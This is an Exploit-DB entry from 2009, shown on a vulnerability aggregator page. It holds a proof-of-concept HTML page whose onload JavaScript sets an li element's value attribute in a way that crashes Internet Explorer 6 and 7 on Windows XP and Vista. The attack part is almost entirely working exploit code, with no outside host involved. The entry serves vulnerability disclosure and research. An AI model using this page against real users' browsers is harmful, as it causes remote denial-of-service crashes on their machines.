Lucene search

K
exploitdbIrfan AsrarEDB-ID:9455
HistoryAug 18, 2009 - 12:00 a.m.

Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash

2009-08-1800:00:00
Irfan Asrar
www.exploit-db.com
22

AI Score

7.4

Confidence

Low

<html>
 <head>
  <title> Irfan Asrar</title>
 </head>
<body onload="c()">
Set Attribute Crash : Tested with IE7 Vista
                                  IE6 XP2
                                  IE6 XP3

<script type="text/javascript">

function c() {

var li = document.createElement("li");
li.setAttribute("value", "1");
li.value = "1";

}

</script>
 </body>
</html>

# milw0rm.com [2009-08-18]

AI Score

7.4

Confidence

Low

Related for EDB-ID:9455